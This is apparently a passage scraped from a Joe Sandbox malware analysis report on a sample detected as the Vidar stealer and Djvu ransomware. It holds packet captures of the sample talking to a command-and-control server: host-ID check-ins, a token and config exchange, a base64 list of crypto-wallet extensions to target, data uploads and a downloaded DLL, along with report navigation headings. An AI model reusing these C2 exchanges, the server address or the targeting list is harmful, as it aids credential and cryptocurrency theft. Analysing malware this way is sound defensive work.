https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Tue, 23 Apr 2024 23:44:31 GMT Content-Length: 33790 Connection: close Set-Cookie: sessionid=d6224b1cabf74ffc69961247; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C8efca4b9dedd65f9ac922759639cacad; Path=/; Secure; HttpOnly; SameSite=None
2024-04-23 23:44:31 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-04-23 23:44:32 UTC	10062	IN	Data Raw: 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6c 69 6e 6b 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 70 75 6c 6c 64 6f 77 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 53 68 6f 77 4d 65 6e 75 28 20 74 68 69 73 2c 20 27 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 27 2c 20 27 72 69 67 68 74 27 20 29 3b 22 3e 6c 61 6e 67 75 61 67 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6c 6f 63 6b 5f 6e 65 77 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0d 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 Data Ascii: obal_action_link" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">
2024-04-23 23:44:32 UTC	9214	IN	Data Raw: 74 65 61 6d 67 61 6d 65 73 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 41 54 53 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 70 61 72 74 6e 65 72 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 49 4e 54 45 52 4e 41 4c 5f 53 54 41 54 53 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 65 61 6d 73 74 61 74 73 2e 76 61 6c 76 65 2e 6f 72 67 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 49 4e 5f 43 4c 49 45 4e 54 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 55 53 45 5f 50 4f 50 55 50 53 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 49 43 4f 4e 5f 42 41 Data Ascii: teamgames.com\/","STATS_BASE_URL":"https:\/\/partner.steampowered.com\/","INTERNAL_STATS_BASE_URL":"https:\/\/steamstats.valve.org\/","IN_CLIENT":false,"USE_POPUPS":false,"STORE_ICON_BA

Timestamp	Bytes transferred	Direction	Data
2024-04-23 23:44:33 UTC	169	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.9.149 Connection: Keep-Alive Cache-Control: no-cache
2024-04-23 23:44:33 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 23:44:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-23 23:44:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-04-23 23:44:36 UTC	261	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDHDHJEBGHJKFIECBGCB User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.9.149 Content-Length: 279 Connection: Keep-Alive Cache-Control: no-cache
2024-04-23 23:44:36 UTC	279	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 45 42 33 38 45 45 34 44 41 37 42 31 39 35 33 34 34 38 30 31 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 37 30 36 64 63 36 63 39 32 30 32 34 33 30 62 63 36 66 62 32 65 37 34 38 39 36 64 38 33 31 31 0d 0a 2d 2d 2d 2d 2d 2d Data Ascii: ------GDHDHJEBGHJKFIECBGCBContent-Disposition: form-data; name="hwid"5EB38EE4DA7B1953448019-a33c7340-61ca-11ee-8c18-806e6f6e6963------GDHDHJEBGHJKFIECBGCBContent-Disposition: form-data; name="build_id"1706dc6c9202430bc6fb2e74896d8311------
2024-04-23 23:44:38 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 23:44:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-23 23:44:38 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 38 36 63 61 39 32 30 39 62 61 63 34 34 35 61 34 31 39 64 34 61 36 35 65 61 38 64 34 62 64 34 31 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|86ca9209bac445a419d4a65ea8d4bd41\|1\|1\|1\|0\|0\|50000\|00

Timestamp	Bytes transferred	Direction	Data
2024-04-23 23:44:37 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-04-23 23:44:38 UTC	885	IN	HTTP/1.1 200 OK Date: Tue, 23 Apr 2024 23:44:37 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KBqVJYrR%2B2amCtbdlD7p81hDfNU95ldX2mu1oS8cFYLq5GAOhuo5tQLZy3HlhdEFGUVfwm6ZIlPzhmlcYJv5y1kry9YlafSGMx8NolRLB0KQvBLQ7p9Uys60CV69"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8791b8fa8bf3db86-LAX alt-svc: h3=":443"; ma=86400
2024-04-23 23:44:38 UTC	405	IN	Data Raw: 31 38 65 0d 0a 7b 22 69 70 22 3a 22 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 76 61 64 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 33 35 5c 75 30 34 33 32 5c 75 30 34 33 30 5c 75 30 34 33 34 5c 75 30 34 33 30 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 33 35 5c 75 30 34 33 32 5c Data Ascii: 18e{"ip":"154.16.105.36","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Nevada","region_rus":"\u041d\u0435\u0432\u0430\u0434\u0430","region_ua":"\u041d\u0435\u0432\
2024-04-23 23:44:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-04-23 23:44:40 UTC	261	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFCBKKFBAEHJKEBKFCB User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.9.149 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-23 23:44:40 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 36 63 61 39 32 30 39 62 61 63 34 34 35 61 34 31 39 64 34 61 36 35 65 61 38 64 34 62 64 34 31 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 37 30 36 64 63 36 63 39 32 30 32 34 33 30 62 63 36 66 62 32 65 37 34 38 39 36 64 38 33 31 31 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 0d 0a 43 6f 6e 74 Data Ascii: ------CBFCBKKFBAEHJKEBKFCBContent-Disposition: form-data; name="token"86ca9209bac445a419d4a65ea8d4bd41------CBFCBKKFBAEHJKEBKFCBContent-Disposition: form-data; name="build_id"1706dc6c9202430bc6fb2e74896d8311------CBFCBKKFBAEHJKEBKFCBCont
2024-04-23 23:44:41 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 23:44:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-23 23:44:41 UTC	5165	IN	Data Raw: 31 34 32 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1420TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report mJVVW85CnW.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Threatname: Djvu

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AAFHIIDHJEBFBFIDAKFB

C:\ProgramData\AFCBKFHJ

C:\ProgramData\EGCFHDAKECFIDGDGDBKJDGIIID

C:\ProgramData\GCAFCAFHJJDBFIECFBKE

C:\ProgramData\GDHDHJEB

C:\ProgramData\GIIIIJDH

C:\ProgramData\HCFCAAEB

Windows Analysis Report
mJVVW85CnW.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 23:44:42 UTC	262	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGDHIEGCFHCGDGCAECBG User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.9.149 Content-Length: 5465 Connection: Keep-Alive Cache-Control: no-cache
2024-04-23 23:44:42 UTC	5465	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 47 44 48 49 45 47 43 46 48 43 47 44 47 43 41 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 36 63 61 39 32 30 39 62 61 63 34 34 35 61 34 31 39 64 34 61 36 35 65 61 38 64 34 62 64 34 31 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 48 49 45 47 43 46 48 43 47 44 47 43 41 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 37 30 36 64 63 36 63 39 32 30 32 34 33 30 62 63 36 66 62 32 65 37 34 38 39 36 64 38 33 31 31 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 48 49 45 47 43 46 48 43 47 44 47 43 41 45 43 42 47 0d 0a 43 6f 6e 74 Data Ascii: ------CGDHIEGCFHCGDGCAECBGContent-Disposition: form-data; name="token"86ca9209bac445a419d4a65ea8d4bd41------CGDHIEGCFHCGDGCAECBGContent-Disposition: form-data; name="build_id"1706dc6c9202430bc6fb2e74896d8311------CGDHIEGCFHCGDGCAECBGCont
2024-04-23 23:44:43 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 23:44:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-23 23:44:43 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Timestamp	Bytes transferred	Direction	Data
2024-04-23 23:44:43 UTC	177	OUT	GET /sqln.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.9.149 Connection: Keep-Alive Cache-Control: no-cache
2024-04-23 23:44:44 UTC	248	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 23:44:44 GMT Content-Type: application/octet-stream Content-Length: 2459136 Last-Modified: Sun, 14 Apr 2024 18:52:51 GMT Connection: close ETag: "661c2603-258600" Accept-Ranges: bytes
2024-04-23 23:44:44 UTC	16136	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-04-23 23:44:45 UTC	16384	IN	Data Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: X~e!*FW\|>\|L1146
2024-04-23 23:44:45 UTC	16384	IN	Data Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
2024-04-23 23:44:45 UTC	16384	IN	Data Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08 Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
2024-04-23 23:44:45 UTC	16384	IN	Data Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff Data Ascii: $;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|D$9D$8vQ
2024-04-23 23:44:45 UTC	16384	IN	Data Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: 3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-04-23 23:44:45 UTC	16384	IN	Data Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
